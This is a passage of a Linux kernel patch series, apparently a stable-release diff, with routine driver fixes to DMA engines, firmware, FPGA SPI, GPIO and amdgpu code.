+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index 529ea09c90940..e63b0c674d883 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -295,7 +295,7 @@ static int idxd_setup_groups(struct idxd_device *idxd)
+ 		}
+ 
+ 		idxd->groups[i] = group;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 3229dfc786507..18cd8151dee02 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -387,7 +387,7 @@ static ssize_t group_traffic_class_a_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+@@ -429,7 +429,7 @@ static ssize_t group_traffic_class_b_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index cc22d162ce250..1aa65e5de0f3a 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -254,7 +254,7 @@ static void pt_issue_pending(struct dma_chan *dma_chan)
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ 
+ 	/* If there was nothing active, start processing */
+-	if (engine_is_idle)
++	if (engine_is_idle && desc)
+ 		pt_cmd_callback(desc, 0);
+ }
+ 
+diff --git a/drivers/dma/sf-pdma/sf-pdma.c b/drivers/dma/sf-pdma/sf-pdma.c
+index 6b524eb6bcf3a..e578ad5569494 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.c
++++ b/drivers/dma/sf-pdma/sf-pdma.c
+@@ -96,7 +96,6 @@ sf_pdma_prep_dma_memcpy(struct dma_chan *dchan,	dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
+ 		return NULL;
+ 
+-	desc->in_use = true;
+ 	desc->dirn = DMA_MEM_TO_MEM;
+ 	desc->async_tx = vchan_tx_prep(&chan->vchan, &desc->vdesc, flags);
+ 
+@@ -290,7 +289,7 @@ static void sf_pdma_free_desc(struct virt_dma_desc *vdesc)
+ 	struct sf_pdma_desc *desc;
+ 
+ 	desc = to_sf_pdma_desc(vdesc);
+-	desc->in_use = false;
++	kfree(desc);
+ }
+ 
+ static void sf_pdma_donebh_tasklet(struct tasklet_struct *t)
+diff --git a/drivers/dma/sf-pdma/sf-pdma.h b/drivers/dma/sf-pdma/sf-pdma.h
+index dcb3687bd5da2..5c398a83b491a 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.h
++++ b/drivers/dma/sf-pdma/sf-pdma.h
+@@ -78,7 +78,6 @@ struct sf_pdma_desc {
+ 	u64				src_addr;
+ 	struct virt_dma_desc		vdesc;
+ 	struct sf_pdma_chan		*chan;
+-	bool				in_use;
+ 	enum dma_transfer_direction	dirn;
+ 	struct dma_async_tx_descriptor *async_tx;
+ };
+diff --git a/drivers/firmware/dmi-sysfs.c b/drivers/firmware/dmi-sysfs.c
+index 66727ad3361b9..402217c570333 100644
+--- a/drivers/firmware/dmi-sysfs.c
++++ b/drivers/firmware/dmi-sysfs.c
+@@ -603,16 +603,16 @@ static void __init dmi_sysfs_register_handle(const struct dmi_header *dh,
+ 	*ret = kobject_init_and_add(&entry->kobj, &dmi_sysfs_entry_ktype, NULL,
+ 				    "%d-%d", dh->type, entry->instance);
+ 
+-	if (*ret) {
+-		kobject_put(&entry->kobj);
+-		return;
+-	}
+-
+ 	/* Thread on the global list for cleanup */
+ 	spin_lock(&entry_list_lock);
+ 	list_add_tail(&entry->list, &entry_list);
+ 	spin_unlock(&entry_list_lock);
+ 
++	if (*ret) {
++		kobject_put(&entry->kobj);
++		return;
++	}
++
+ 	/* Handle specializations by type */
+ 	switch (dh->type) {
+ 	case DMI_ENTRY_SYSTEM_EVENT_LOG:
+diff --git a/drivers/firmware/google/framebuffer-coreboot.c b/drivers/firmware/google/framebuffer-coreboot.c
+index c6dcc1ef93acf..c323a818805cc 100644
+--- a/drivers/firmware/google/framebuffer-coreboot.c
++++ b/drivers/firmware/google/framebuffer-coreboot.c
+@@ -43,9 +43,7 @@ static int framebuffer_probe(struct coreboot_device *dev)
+ 		    fb->green_mask_pos     == formats[i].green.offset &&
+ 		    fb->green_mask_size    == formats[i].green.length &&
+ 		    fb->blue_mask_pos      == formats[i].blue.offset &&
+-		    fb->blue_mask_size     == formats[i].blue.length &&
+-		    fb->reserved_mask_pos  == formats[i].transp.offset &&
+-		    fb->reserved_mask_size == formats[i].transp.length)
++		    fb->blue_mask_size     == formats[i].blue.length)
+ 			pdata.format = formats[i].name;
+ 	}
+ 	if (!pdata.format)
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index 447ee4ea5c903..f78249fe2512a 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -108,9 +108,10 @@ bool psci_power_state_is_valid(u32 state)
+ 	return !(state & ~valid_mask);
+ }
+ 
+-static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_hvc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -118,9 +119,10 @@ static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_smc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -128,7 +130,7 @@ static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static int psci_to_linux_errno(int errno)
++static __always_inline int psci_to_linux_errno(int errno)
+ {
+ 	switch (errno) {
+ 	case PSCI_RET_SUCCESS:
+@@ -169,7 +171,8 @@ int psci_set_osi_mode(bool enable)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
++static __always_inline int
++__psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ {
+ 	int err;
+ 
+@@ -177,13 +180,15 @@ static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(psci_0_1_function_ids.cpu_suspend,
+ 				  state, entry_point);
+ }
+ 
+-static int psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(PSCI_FN_NATIVE(0_2, CPU_SUSPEND),
+ 				  state, entry_point);
+@@ -450,10 +455,12 @@ late_initcall(psci_debugfs_init)
+ #endif
+ 
+ #ifdef CONFIG_CPU_IDLE
+-static int psci_suspend_finisher(unsigned long state)
++static noinstr int psci_suspend_finisher(unsigned long state)
+ {
+ 	u32 power_state = state;
+-	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
++	phys_addr_t pa_cpu_resume;
++
++	pa_cpu_resume = __pa_symbol_nodebug((unsigned long)cpu_resume);
+ 
+ 	return psci_ops.cpu_suspend(power_state, pa_cpu_resume);
+ }
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index b4081f4d88a37..bde1f543f5298 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1138,13 +1138,17 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+-	if (!controller)
+-		return -ENOMEM;
++	if (!controller) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	chans = devm_kmalloc_array(dev, SVC_NUM_CHANNEL,
+ 				   sizeof(*chans), GFP_KERNEL | __GFP_ZERO);
+-	if (!chans)
+-		return -ENOMEM;
++	if (!chans) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	controller->dev = dev;
+ 	controller->num_chans = SVC_NUM_CHANNEL;
+@@ -1159,7 +1163,7 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = kfifo_alloc(&controller->svc_fifo, fifo_size, GFP_KERNEL);
+ 	if (ret) {
+ 		dev_err(dev, "failed to allocate FIFO\n");
+-		return ret;
++		goto err_destroy_pool;
+ 	}
+ 	spin_lock_init(&controller->svc_fifo_lock);
+ 
+@@ -1198,19 +1202,20 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = platform_device_add(svc->stratix10_svc_rsu);
+ 	if (ret) {
+ 		platform_device_put(svc->stratix10_svc_rsu);
+-		return ret;
++		goto err_free_kfifo;
+ 	}
+ 
+ 	svc->intel_svc_fcs = platform_device_alloc(INTEL_FCS, 1);
+ 	if (!svc->intel_svc_fcs) {
+ 		dev_err(dev, "failed to allocate %s device\n", INTEL_FCS);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	ret = platform_device_add(svc->intel_svc_fcs);
+ 	if (ret) {
+ 		platform_device_put(svc->intel_svc_fcs);
+-		return ret;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	dev_set_drvdata(dev, svc);
+@@ -1219,8 +1224,12 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_unregister_dev:
++	platform_device_unregister(svc->stratix10_svc_rsu);
+ err_free_kfifo:
+ 	kfifo_free(&controller->svc_fifo);
++err_destroy_pool:
++	gen_pool_destroy(genpool);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/fpga/microchip-spi.c b/drivers/fpga/microchip-spi.c
+index 7436976ea9048..137fafdf57a6f 100644
+--- a/drivers/fpga/microchip-spi.c
++++ b/drivers/fpga/microchip-spi.c
+@@ -6,6 +6,7 @@
+ #include <asm/unaligned.h>
+ #include <linux/delay.h>
+ #include <linux/fpga/fpga-mgr.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+ #include <linux/spi/spi.h>
+@@ -33,7 +34,7 @@
+ 
+ #define	MPF_BITS_PER_COMPONENT_SIZE	22
+ 
+-#define	MPF_STATUS_POLL_RETRIES		10000
++#define	MPF_STATUS_POLL_TIMEOUT		(2 * USEC_PER_SEC)
+ #define	MPF_STATUS_BUSY			BIT(0)
+ #define	MPF_STATUS_READY		BIT(1)
+ #define	MPF_STATUS_SPI_VIOLATION	BIT(2)
+@@ -42,46 +43,55 @@
+ struct mpf_priv {
+ 	struct spi_device *spi;
+ 	bool program_mode;
++	u8 tx __aligned(ARCH_KMALLOC_MINALIGN);
++	u8 rx;
+ };
+ 
+-static int mpf_read_status(struct spi_device *spi)
++static int mpf_read_status(struct mpf_priv *priv)
+ {
+-	u8 status = 0, status_command = MPF_SPI_READ_STATUS;
+-	struct spi_transfer xfers[2] = { 0 };
+-	int ret;
+-
+ 	/*
+ 	 * HW status is returned on MISO in the first byte after CS went
+ 	 * active. However, first reading can be inadequate, so we submit
+ 	 * two identical SPI transfers and use result of the later one.
+ 	 */
+-	xfers[0].tx_buf = &status_command;
+-	xfers[1].tx_buf = &status_command;
+-	xfers[0].rx_buf = &status;
+-	xfers[1].rx_buf = &status;
+-	xfers[0].len = 1;
+-	xfers[1].len = 1;
+-	xfers[0].cs_change = 1;
++	struct spi_transfer xfers[2] = {
++		{
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++			.cs_change = 1,
++		}, {
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++		},
++	};
++	u8 status;
++	int ret;
+ 
+-	ret = spi_sync_transfer(spi, xfers, 2);
++	priv->tx = MPF_SPI_READ_STATUS;
++
++	ret = spi_sync_transfer(priv->spi, xfers, 2);
++	if (ret)
++		return ret;
++
++	status = priv->rx;
+ 
+ 	if ((status & MPF_STATUS_SPI_VIOLATION) ||
+ 	    (status & MPF_STATUS_SPI_ERROR))
+-		ret = -EIO;
++		return -EIO;
+ 
+-	return ret ? : status;
++	return status;
+ }
+ 
+ static enum fpga_mgr_states mpf_ops_state(struct fpga_manager *mgr)
+ {
+ 	struct mpf_priv *priv = mgr->priv;
+-	struct spi_device *spi;
+ 	bool program_mode;
+ 	int status;
+ 
+-	spi = priv->spi;
+ 	program_mode = priv->program_mode;
+-	status = mpf_read_status(spi);
++	status = mpf_read_status(priv);
+ 
+ 	if (!program_mode && !status)
+ 		return FPGA_MGR_STATE_OPERATING;
+@@ -185,52 +195,53 @@ static int mpf_ops_parse_header(struct fpga_manager *mgr,
+ 	return 0;
+ }
+ 
+-/* Poll HW status until busy bit is cleared and mask bits are set. */
+-static int mpf_poll_status(struct spi_device *spi, u8 mask)
++static int mpf_poll_status(struct mpf_priv *priv, u8 mask)
+ {
+-	int status, retries = MPF_STATUS_POLL_RETRIES;
++	int ret, status;
+ 
+-	while (retries--) {
+-		status = mpf_read_status(spi);
+-		if (status < 0)
+-			return status;
+-
+-		if (status & MPF_STATUS_BUSY)
+-			continue;
+-
+-		if (!mask || (status & mask))
+-			return status;
+-	}
++	/*
++	 * Busy poll HW status. Polling stops if any of the following
++	 * conditions are met:
++	 *  - timeout is reached
++	 *  - mpf_read_status() returns an error
++	 *  - busy bit is cleared AND mask bits are set
++	 */
++	ret = read_poll_timeout(mpf_read_status, status,
++				(status < 0) ||
++				((status & (MPF_STATUS_BUSY | mask)) == mask),
++				0, MPF_STATUS_POLL_TIMEOUT, false, priv);
++	if (ret < 0)
++		return ret;
+ 
+-	return -EBUSY;
++	return status;
+ }
+ 
+-static int mpf_spi_write(struct spi_device *spi, const void *buf, size_t buf_size)
++static int mpf_spi_write(struct mpf_priv *priv, const void *buf, size_t buf_size)
+ {
+-	int status = mpf_poll_status(spi, 0);
++	int status = mpf_poll_status(priv, 0);
+ 
+ 	if (status < 0)
+ 		return status;
+ 
+-	return spi_write(spi, buf, buf_size);
++	return spi_write_then_read(priv->spi, buf, buf_size, NULL, 0);
+ }
+ 
+-static int mpf_spi_write_then_read(struct spi_device *spi,
++static int mpf_spi_write_then_read(struct mpf_priv *priv,
+ 				   const void *txbuf, size_t txbuf_size,
+ 				   void *rxbuf, size_t rxbuf_size)
+ {
+ 	const u8 read_command[] = { MPF_SPI_READ_DATA };
+ 	int ret;
+ 
+-	ret = mpf_spi_write(spi, txbuf, txbuf_size);
++	ret = mpf_spi_write(priv, txbuf, txbuf_size);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mpf_poll_status(spi, MPF_STATUS_READY);
++	ret = mpf_poll_status(priv, MPF_STATUS_READY);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return spi_write_then_read(spi, read_command, sizeof(read_command),
++	return spi_write_then_read(priv->spi, read_command, sizeof(read_command),
+ 				   rxbuf, rxbuf_size);
+ }
+ 
+@@ -242,7 +253,6 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 	const u8 isc_en_command[] = { MPF_SPI_ISC_ENABLE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	u32 isc_ret = 0;
+ 	int ret;
+ 
+@@ -251,9 +261,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write_then_read(spi, isc_en_command, sizeof(isc_en_command),
++	ret = mpf_spi_write_then_read(priv, isc_en_command, sizeof(isc_en_command),
+ 				      &isc_ret, sizeof(isc_ret));
+ 	if (ret || isc_ret) {
+ 		dev_err(dev, "Failed to enable ISC: spi_ret %d, isc_ret %u\n",
+@@ -261,7 +269,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = mpf_spi_write(spi, program_mode, sizeof(program_mode));
++	ret = mpf_spi_write(priv, program_mode, sizeof(program_mode));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to enter program mode: %d\n", ret);
+ 		return ret;
+@@ -274,11 +282,9 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 
+ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count)
+ {
+-	u8 spi_frame_command[] = { MPF_SPI_FRAME };
+ 	struct spi_transfer xfers[2] = { 0 };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret, i;
+ 
+ 	if (count % MPF_SPI_FRAME_SIZE) {
+@@ -287,18 +293,18 @@ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count
+ 		return -EINVAL;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	xfers[0].tx_buf = spi_frame_command;
+-	xfers[0].len = sizeof(spi_frame_command);
++	xfers[0].tx_buf = &priv->tx;
++	xfers[0].len = 1;
+ 
+ 	for (i = 0; i < count / MPF_SPI_FRAME_SIZE; i++) {
+ 		xfers[1].tx_buf = buf + i * MPF_SPI_FRAME_SIZE;
+ 		xfers[1].len = MPF_SPI_FRAME_SIZE;
+ 
+-		ret = mpf_poll_status(spi, 0);
+-		if (ret >= 0)
+-			ret = spi_sync_transfer(spi, xfers, ARRAY_SIZE(xfers));
++		ret = mpf_poll_status(priv, 0);
++		if (ret >= 0) {
++			priv->tx = MPF_SPI_FRAME;
++			ret = spi_sync_transfer(priv->spi, xfers, ARRAY_SIZE(xfers));
++		}
+ 
+ 		if (ret) {
+ 			dev_err(dev, "Failed to write bitstream frame %d/%zu\n",
+@@ -317,12 +323,9 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 	const u8 release_command[] = { MPF_SPI_RELEASE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret;
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write(spi, isc_dis_command, sizeof(isc_dis_command));
++	ret = mpf_spi_write(priv, isc_dis_command, sizeof(isc_dis_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to disable ISC: %d\n", ret);
+ 		return ret;
+@@ -330,7 +333,7 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 
+ 	usleep_range(1000, 2000);
+ 
+-	ret = mpf_spi_write(spi, release_command, sizeof(release_command));
++	ret = mpf_spi_write(priv, release_command, sizeof(release_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to exit program mode: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpio/gpio-pca9570.c b/drivers/gpio/gpio-pca9570.c
+index 6c07a8811a7a5..6a5a8e593ed55 100644
+--- a/drivers/gpio/gpio-pca9570.c
++++ b/drivers/gpio/gpio-pca9570.c
+@@ -18,11 +18,11 @@
+ #define SLG7XL45106_GPO_REG	0xDB
+ 
+ /**
+- * struct pca9570_platform_data - GPIO platformdata
++ * struct pca9570_chip_data - GPIO platformdata
+  * @ngpio: no of gpios
+  * @command: Command to be sent
+  */
+-struct pca9570_platform_data {
++struct pca9570_chip_data {
+ 	u16 ngpio;
+ 	u32 command;
+ };
+@@ -36,7 +36,7 @@ struct pca9570_platform_data {
+  */
+ struct pca9570 {
+ 	struct gpio_chip chip;
+-	const struct pca9570_platform_data *p_data;
++	const struct pca9570_chip_data *chip_data;
+ 	struct mutex lock;
+ 	u8 out;
+ };
+@@ -46,8 +46,8 @@ static int pca9570_read(struct pca9570 *gpio, u8 *value)
+ 	struct i2c_client *client = to_i2c_client(gpio->chip.parent);
+ 	int ret;
+ 
+-	if (gpio->p_data->command != 0)
+-		ret = i2c_smbus_read_byte_data(client, gpio->p_data->command);
++	if (gpio->chip_data->command != 0)
++		ret = i2c_smbus_read_byte_data(client, gpio->chip_data->command);
+ 	else
+ 		ret = i2c_smbus_read_byte(client);
+ 
+@@ -62,8 +62,8 @@ static int pca9570_write(struct pca9570 *gpio, u8 value)
+ {
+ 	struct i2c_client *client = to_i2c_client(gpio->chip.parent);
+ 
+-	if (gpio->p_data->command != 0)
+-		return i2c_smbus_write_byte_data(client, gpio->p_data->command, value);
++	if (gpio->chip_data->command != 0)
++		return i2c_smbus_write_byte_data(client, gpio->chip_data->command, value);
+ 
+ 	return i2c_smbus_write_byte(client, value);
+ }
+@@ -127,8 +127,8 @@ static int pca9570_probe(struct i2c_client *client)
+ 	gpio->chip.get = pca9570_get;
+ 	gpio->chip.set = pca9570_set;
+ 	gpio->chip.base = -1;
+-	gpio->p_data = device_get_match_data(&client->dev);
+-	gpio->chip.ngpio = gpio->p_data->ngpio;
++	gpio->chip_data = device_get_match_data(&client->dev);
++	gpio->chip.ngpio = gpio->chip_data->ngpio;
+ 	gpio->chip.can_sleep = true;
+ 
+ 	mutex_init(&gpio->lock);
+@@ -141,15 +141,15 @@ static int pca9570_probe(struct i2c_client *client)
+ 	return devm_gpiochip_add_data(&client->dev, &gpio->chip, gpio);
+ }
+ 
+-static const struct pca9570_platform_data pca9570_gpio = {
++static const struct pca9570_chip_data pca9570_gpio = {
+ 	.ngpio = 4,
+ };
+ 
+-static const struct pca9570_platform_data pca9571_gpio = {
++static const struct pca9570_chip_data pca9571_gpio = {
+ 	.ngpio = 8,
+ };
+ 
+-static const struct pca9570_platform_data slg7xl45106_gpio = {
++static const struct pca9570_chip_data slg7xl45106_gpio = {
+ 	.ngpio = 8,
+ 	.command = SLG7XL45106_GPO_REG,
+ };
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index 9033db00c360d..d3f3a69d49077 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -317,7 +317,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 
+ 	gc = &port->gc;
+ 	gc->parent = dev;
+-	gc->label = "vf610-gpio";
++	gc->label = dev_name(dev);
+ 	gc->ngpio = VF610_GPIO_PER_PORT;
+ 	gc->base = of_alias_get_id(np, "gpio") * VF610_GPIO_PER_PORT;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 0040deaf8a83a..90a5254ec1387 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -97,7 +97,7 @@ struct amdgpu_amdkfd_fence {
+ 
+ struct amdgpu_kfd_dev {
+ 	struct kfd_dev *dev;
+-	uint64_t vram_used;
++	int64_t vram_used;
+ 	uint64_t vram_used_aligned;
+ 	bool init_complete;
+ 	struct work_struct reset_work;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 3b5c53712d319..05b884fe0a927 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1612,6 +1612,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	struct amdgpu_bo *bo;
+ 	struct drm_gem_object *gobj = NULL;
+ 	u32 domain, alloc_domain;
++	uint64_t aligned_size;
+ 	u64 alloc_flags;
+ 	int ret;
+ 
+@@ -1667,22 +1668,23 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	 * the memory.
+ 	 */
+ 	if ((*mem)->aql_queue)
+-		size = size >> 1;
++		size >>= 1;
++	aligned_size = PAGE_ALIGN(size);
+ 
+ 	(*mem)->alloc_flags = flags;
+ 
+ 	amdgpu_sync_create(&(*mem)->sync);
+ 
+-	ret = amdgpu_amdkfd_reserve_mem_limit(adev, size, flags);
++	ret = amdgpu_amdkfd_reserve_mem_limit(adev, aligned_size, flags);
+ 	if (ret) {
+ 		pr_debug("Insufficient memory\n");
+ 		goto err_reserve_limit;
+ 	}
+ 
+ 	pr_debug("\tcreate BO VA 0x%llx size 0x%llx domain %s\n",
+-			va, size, domain_string(alloc_domain));
++			va, (*mem)->aql_queue ? size << 1 : size, domain_string(alloc_domain));
+ 
+-	ret = amdgpu_gem_object_create(adev, size, 1, alloc_domain, alloc_flags,
++	ret = amdgpu_gem_object_create(adev, aligned_size, 1, alloc_domain, alloc_flags,
+ 				       bo_type, NULL, &gobj);
+ 	if (ret) {
+ 		pr_debug("Failed to create BO on domain %s. ret %d\n",
+@@ -1739,7 +1741,7 @@ err_node_allow:
+ 	/* Don't unreserve system mem limit twice */
+ 	goto err_reserve_limit;
+ err_bo_create:
+-	amdgpu_amdkfd_unreserve_mem_limit(adev, size, flags);
++	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index fbf2f24169eb5..d8e79de839d65 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4022,7 +4022,8 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	amdgpu_gart_dummy_page_fini(adev);
+ 
+-	amdgpu_device_unmap_mmio(adev);
++	if (drm_dev_is_unplugged(adev_to_drm(adev)))
++		amdgpu_device_unmap_mmio(adev);
+ 
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 3fe277bc233f4..7f598977d6942 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2236,6 +2236,8 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 	struct drm_device *dev = pci_get_drvdata(pdev);
+ 	struct amdgpu_device *adev = drm_to_adev(dev);
+ 
++	drm_dev_unplug(dev);
++
+ 	if (adev->pm.rpm_mode != AMDGPU_RUNPM_NONE) {
+ 		pm_runtime_get_sync(dev->dev);
+ 		pm_runtime_forbid(dev->dev);
+@@ -2275,8 +2277,6 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 
+ 	amdgpu_driver_unload_kms(dev);
+ 
+-	drm_dev_unplug(dev);
+-
+ 	/*
+ 	 * Flush any in flight DMA operations from device.
+ 	 * Clear the Bus Master Enable bit and then wait on the PCIe Device
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 7a2fc920739bb..ba092072308fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -380,7 +380,7 @@ static int psp_init_sriov_microcode(struct psp_context *psp)
+ 		adev->virt.autoload_ucode_id = AMDGPU_UCODE_ID_CP_MES1_DATA;
+ 		break;
+ 	default:
+-		BUG();
++		ret = -EINVAL;
+ 		break;
+ 	}
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+index 677ad2016976d..98d91ebf5c26b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+@@ -153,10 +153,10 @@ TRACE_EVENT(amdgpu_cs,
+ 
+ 	    TP_fast_assign(
+ 			   __entry->bo_list = p->bo_list;
+-			   __entry->ring = to_amdgpu_ring(job->base.sched)->idx;
++			   __entry->ring = to_amdgpu_ring(job->base.entity->rq->sched)->idx;
+ 			   __entry->dw = ib->length_dw;
+ 			   __entry->fences = amdgpu_fence_count_emitted(
+-				to_amdgpu_ring(job->base.sched));
++				to_amdgpu_ring(job->base.entity->rq->sched));
+ 			   ),
+ 	    TP_printk("bo_list=%p, ring=%u, dw=%u, fences=%u",
+ 		      __entry->bo_list, __entry->ring, __entry->dw,
